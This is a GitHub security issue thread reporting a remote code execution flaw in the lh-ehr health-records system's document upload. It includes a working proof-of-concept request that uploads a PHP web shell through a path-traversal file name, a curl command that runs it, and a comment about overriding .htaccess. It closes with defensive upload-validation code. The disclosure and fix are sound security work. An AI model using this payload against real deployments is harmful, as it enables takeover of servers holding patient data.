
Security Issue: Remote code execution in Misc->New Documents

Open C-Sto opened this issue 5 years ago • 7 comments

The Issue

Arbitrary file upload vulnerability allowing any user who can upload patient documents to run arbitrary system commands on the host machine. As with the user profile picture vulnerability, once a malicious document has been uploaded by an authenticated user, no authentication is required to execute system commands.

In lh-ehr, an attacker must be authenticated, and have sufficient privileges to upload a patient document via the 'Miscellaneous -> New Documents' function.

Issue location

Occurs at https://github.com/LibreHealthIO/lh-ehr/blob/5b5f427c4742f901e426f17325fb0aaf8209e0bb/controllers/C_Document.class.php#L158-L192

POC:

POST /lh-ehr/controller.php?document%00&upload&patient_id=00&parent_id=13& HTTP/1.1
Host: 192.168.0.107
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.107/lh-ehr/controller.php?document&upload&patient_id=00&parent_id=13&
Content-Type: multipart/form-data; boundary=---------------------------130432852327676
Content-Length: 764
Cookie: TreeMenuBranchStatus=; LibreHealthEHR=rj2qsugifs5g94fhvpttg8uotb
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------130432852327676
Content-Disposition: form-data; name="MAX_FILE_SIZE"

64000000
-----------------------------130432852327676
Content-Disposition: form-data; name="file[]"; filename="../../hack.php"
Content-Type: application/x-msdownload

<?php echo `$_GET[cmd]`; ?>

-----------------------------130432852327676
Content-Disposition: form-data; name="destination"


-----------------------------130432852327676
Content-Disposition: form-data; name="patient_id"

00
-----------------------------130432852327676
Content-Disposition: form-data; name="category_id"

13
-----------------------------130432852327676
Content-Disposition: form-data; name="process"

true
-----------------------------130432852327676--

root@ubuntu:/var/www/html/lh-ehr# curl 127.0.0.1/lh-ehr/sites/default/documents/00/1371/hack.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

C-Sto avatar Aug 12 '18 09:08 C-Sto

Authorized user hack possible. Anyone care to address this? The "filemanager" tool is fully sand-boxed, but these normal document uploads are not. Needs to have at least an executable file extension mask on the allowed upload, right? HOWEVER: Attempted to execute the code with a properly configured system as per installation instructions: (screenshot attached)

I attempted to access the code I uploaded, but the whole /sites/ directory seems pretty well protected. How should I go about implementing an attack using the uploaded code as a proof?

aethelwulffe avatar Oct 01 '18 16:10 aethelwulffe

Strange, the .htaccess file should have prevented execution on my system too.

I suspect it might be possible to overwrite it with the right parameters, which would then allow execution.

C-Sto avatar Nov 05 '18 05:11 C-Sto

I would like to be assigned this issue.

wisdommatt avatar Mar 25 '20 22:03 wisdommatt

Go ahead

On Wed, 25 Mar 2020 at 23:26 wisdommatthew [email protected] wrote:

I would like to be assigned this issue.


muarachmann avatar Mar 25 '20 22:03 muarachmann

It also accepts uploads of PHP files.

I think it would be more secure to restrict uploaded files to just some file formats.

wisdommatt avatar Mar 26 '20 00:03 wisdommatt

I have tested the remote code execution issue. .htaccess blocks file access to the uploaded files.

(screenshot attached)

@C-Sto I think yours went through because the site was not set up completely.

wisdommatt avatar Mar 26 '20 02:03 wisdommatt

That sounds accurate - I had a bunch of issues in getting it set up and working.

I suspect that if you can upload .htaccess files to that folder then you would be able to override the restrictions, though.

C-Sto avatar Apr 08 '20 00:04 C-Sto
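The thread converges on three defensive points: the client-supplied file name must never be used as a path (the proof of concept relies on `../../hack.php`), uploads should be limited to an allow-list of document formats rather than a deny-list of executable extensions, and the web server must refuse to serve or execute anything in the documents directory, which also rules out an uploaded `.htaccess` overriding that rule. The following is an added example illustrating those three checks together; it is not lh-ehr's own code, and the function names, the allow-list, the `$documents_dir` layout and the use of a per-directory `Require all denied` file are assumptions made for illustration.

```php
<?php
// Added example (not lh-ehr code): defensive handling of a patient-document upload.
// Assumed names: safe_document_name(), content_matches_extension(),
// ensure_no_serve_htaccess(), store_patient_document(), $documents_dir.

// Allow-list of formats the application is willing to store. Anything else is
// rejected, so there is no need to enumerate .php, .phtml, .phar, .htaccess, ...
const ALLOWED_DOCUMENT_EXTENSIONS = ['pdf', 'jpg', 'jpeg', 'png', 'gif', 'txt'];

/**
 * Return a safe on-disk name for the upload, or null when it must be rejected.
 * The client name is only consulted for its extension: basename() discards any
 * directory components ("../../hack.php" becomes "hack.php"), dotfiles such as
 * ".htaccess" are refused, and the stored name is a random token plus the vetted
 * extension, so the original name never reaches the filesystem.
 */
function safe_document_name(string $client_filename): ?string
{
    $base = basename(str_replace("\0", '', $client_filename));   // drop NUL bytes and directories
    if ($base === '' || $base[0] === '.') {                       // refuses ".htaccess", ".user.ini", "."
        return null;
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_DOCUMENT_EXTENSIONS, true)) {
        return null;
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

/**
 * Check the file's magic bytes against the declared extension using finfo,
 * ignoring the client's Content-Type header (the PoC sends
 * application/x-msdownload with a PHP body).
 */
function content_matches_extension(string $tmp_path, string $ext): bool
{
    $expected = [
        'pdf' => 'application/pdf', 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
        'png' => 'image/png',       'gif' => 'image/gif',  'txt'  => 'text/plain',
    ];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp_path);
    return isset($expected[$ext]) && $mime === $expected[$ext];
}

/**
 * Defense in depth: make sure the documents directory carries a deny-all
 * .htaccess, so an install that skipped the web-server setup step (the case
 * discussed above) still cannot serve or execute uploads directly. Only
 * effective when AllowOverride permits it; a rule in the main server config
 * is the stronger choice.
 */
function ensure_no_serve_htaccess(string $dir): void
{
    $htaccess = $dir . DIRECTORY_SEPARATOR . '.htaccess';
    if (!file_exists($htaccess)) {
        file_put_contents($htaccess, "Require all denied\n");
    }
}

/** Validate one entry of $_FILES and move it into $documents_dir. */
function store_patient_document(array $upload, string $documents_dir): string
{
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($upload['tmp_name'])) {
        throw new RuntimeException('no valid upload');
    }
    $name = safe_document_name((string) $upload['name']);
    if ($name === null) {
        throw new RuntimeException('file type not permitted');
    }
    $ext = pathinfo($name, PATHINFO_EXTENSION);
    if (!content_matches_extension($upload['tmp_name'], $ext)) {
        throw new RuntimeException('file content does not match its extension');
    }
    ensure_no_serve_htaccess($documents_dir);
    $dest = $documents_dir . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($upload['tmp_name'], $dest)) {
        throw new RuntimeException('could not store document');
    }
    chmod($dest, 0640);   // readable by the application, never executable
    return $dest;
}

// Usage (assumed): $path = store_patient_document($_FILES['file'], '/var/www/lh-ehr/sites/default/documents/00');
```

With this in place the PoC request above fails at `safe_document_name()`: `../../hack.php` reduces to `hack.php`, whose extension is not on the allow-list. A renamed payload such as `hack.pdf` is then caught by `content_matches_extension()`, and even a file that passes both checks lands under a random name in a directory the web server refuses to serve, which is the property the `.htaccess` discussion in this thread depends on.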